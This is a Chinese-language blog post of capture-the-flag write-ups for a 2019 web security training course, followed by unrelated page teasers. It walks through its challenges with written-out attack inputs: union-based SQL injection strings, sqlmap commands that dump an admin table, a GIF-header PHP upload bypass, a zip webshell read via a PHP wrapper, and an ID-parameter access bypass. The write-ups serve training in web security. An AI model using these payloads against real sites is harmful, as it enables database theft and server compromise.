2019WEB安全攻防技能 [基础班] - CTF夺旗赛WP

Flag参数

  • 解题步骤

    根据题目提示,通过POST的方式传递flag参数,回显参数的值需要大于10位,因此传递大于10位的flag参数如下,获得flag:
    image.png

input

  • 解题步骤

    右键查看源代码,发现js的check函数,阅读源代码,发现输入的flag值要与str字符串的结果一致,才能通过,直接丢进控制台,打印str变量的值获得flag的值:
    image.png

企业小白运维人员

  • 解题步骤

    访问首页,右键查看源代码,根据提示访问网站的备份文件,右键查看源代码,根据代码内容传递user和password两个参数即可获得flag:
    image.png

100块钱都不给我

通过查看源代码、请求头和响应头没发现什么,访问robots.txt,发现网站隐藏目录:
image.png

访问index.php1发现关键代码:
image.png

发现会将ctf的参数值作为函数名执行,因此传递ctf=phpinfo,在首页获得flag:
image.png

搜what?

  • 解题步骤
    查看页面发现可能SQL注入,通过POST传值获得flag:
    word=1'or 1=1 order by 3#&&number=5查询字段数为3
    word=1'or 1=1 union select 1,2,3#&&number=5三个字段的结果都回显
    word=1'or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=database()#&&number=5查询到admin和news两张表
    word=1'or 1=1 union select 1,column_name,3 from information_schema.columns where table_name='admin'#&&number=5查询admin表的字段名,发现有flag字段
    word=1'or 1=1 union select 1,flag,3 from admin#&&number=5查询到flag字段的值

来上传!

通过上传测试,发现是文件头校验,因此抓包,在木马内容基础上再加gif文件头,结构如下:GIF89a<?php phpinfo(); ?>

image.png

包罗万象

发现可以上传zip文件,构造一句话木马的压缩包,然后用php伪协议读取执行命令,用base64命令读取flag.php源代码获取flag:


image.png

flag.php

阿!核弹

  • 解题步骤

    访问根据题目默认的账号密码登录进入,发现有flag按钮,点击提示没有权限,控制台查看流量包发现存在ownerbug和flag.do,查看第二个包
    flag.do请求头
    flag.do响应头

    当传入uid参数为1000时候,响应是"owner_bugs",修改uid参数为1时候,回显是flag,
    image.png
    根据提示,访问flag目录,获得flag:
    image.png

本题考察的是linux的越权控制,在登录Linux时,看起来是登录的账号,其实在计算机中仅仅认识ID,而每个登录的用户都会取得两个
ID这就是GID与UID。UID也称为用户ID(UserID),GID也称为用户组ID(Group ID)。操作系统就是利用它两来判断文件的所有者与用户组的。用户的UID大于500的都是非系统账号,500以下的都为系统保留的账号,比如root账号,至高权限的账号的UID为0。

这密码到底是啥!

  • 解题步骤bp抓包,右键发送到sqlmap进行攻击:
    sqlmap.py -r C:\Users\DELL\AppData\Local\Temp\\1548293714030.req --dbs发现有information_schema和manager_haha两个数据库,对第二个数据库爆表名:
    sqlmap.py -r C:\Users\DELL\AppData\Local\Temp\\1548293714030.req -D manager_haha --tables发现有admin表,继续爆破字段名:
    sqlmap.py -r C:\Users\DELL\AppData\Local\Temp\\1548293714030.req -D manager_haha -T admin --columns发现有可疑字段名:f149_k3y,接着爆破字段值:
    sqlmap.py -r C:\Users\DELL\AppData\Local\Temp\\1548293714030.req -D manager_haha -T admin -C f149_k3y --dump结果如下:
    flag.png

看你有什么办法

  • 解题步骤
    根据首页源代码提示访问index.bak页面,查看源代码,发现关键代码:
<?php
function filter($v){
  echo $v;
  $w = array('<','>','\.\.','^/+.*','file:///','php://','data://','zip://','ftp://','phar://','zlib://','glob://','expect://','http://','https://');
  $w = implode('|',$w);
  if(preg_match('#' . $w . '#i',$v) !== 0){
    die("
not that easy.");
    exit();
  }
  return $v;
}

根据代码可知过滤了超多的协议,其中
file://协议
都为off状态下也可以使用,直接访问本地文件系统。
格式:file:// [文件的绝对路径和文件名]
例如:file://localhost/文件
这里需要用到远程文件包含,但因为不能用ip地址(因为靶机无无法访问外网ip),所以用localhost代替
原版协议:https://en.wikipedia.org/wiki/File_URI_scheme

file协议.png

根据题目提示在网站根目录/flag文件下,构造playload访问如下:
image.png

dota

  • 解题步骤
    根据提示猜测源代码泄漏,访问www.zip获取源代码,下载解压发现有flag.php文件,打开得到flag:
    flag.png

X集团超级无敌新闻网站

  • 解题步骤

    扫描后台,发现敏感目录:
    image.png
    访问admin/left.jsp会重定向跳转回admin这个登陆界面,查看源代码发现有网页跳转js代码,如下:
    跳转.png

这里可以尝试用noscript插件,禁掉js,成功访问后如下,flag点了后没用,就点新闻管理进入编辑界面,发现注入点:
admin/left.jsp

通过sqlmap跑,拿到用户名和密码,如下:
admin.png
在后台登录界面用账号和密码登录即可查看到flag,如下:
flag.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 211,376评论 6 491
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,126评论 2 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 156,966评论 0 347
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,432评论 1 283
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,519评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,792评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,933评论 3 406
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,701评论 0 266
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,143评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,488评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,626评论 1 340
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,292评论 4 329
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,896评论 3 313
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,742评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,977评论 1 265
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,324评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,494评论 2 348

推荐阅读更多精彩内容

  • pyspark.sql模块 模块上下文 Spark SQL和DataFrames的重要类: pyspark.sql...
    mpro阅读 9,448评论 0 13
  • web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被...
    查无此人asdasd阅读 7,266评论 0 5
  • Spark SQL, DataFrames and Datasets Guide Overview SQL Dat...
    草里有只羊阅读 18,303评论 0 85
  • 徐徐风雅行 苦苦楚辞吟 古文不解意 乐府总关情 胡歌燕舞临 唐诗宋词经 元曲识人和 戏剧通幽径
    陇右行思阅读 313评论 3 10
  • 忙碌过后,闲下来翻翻微信的时候已经快到六点钟,要下班了。猛然一下,一条信息窜进眼帘“冬至到了,发祝福给你的亲朋好在...
    芸鸽阅读 532评论 0 1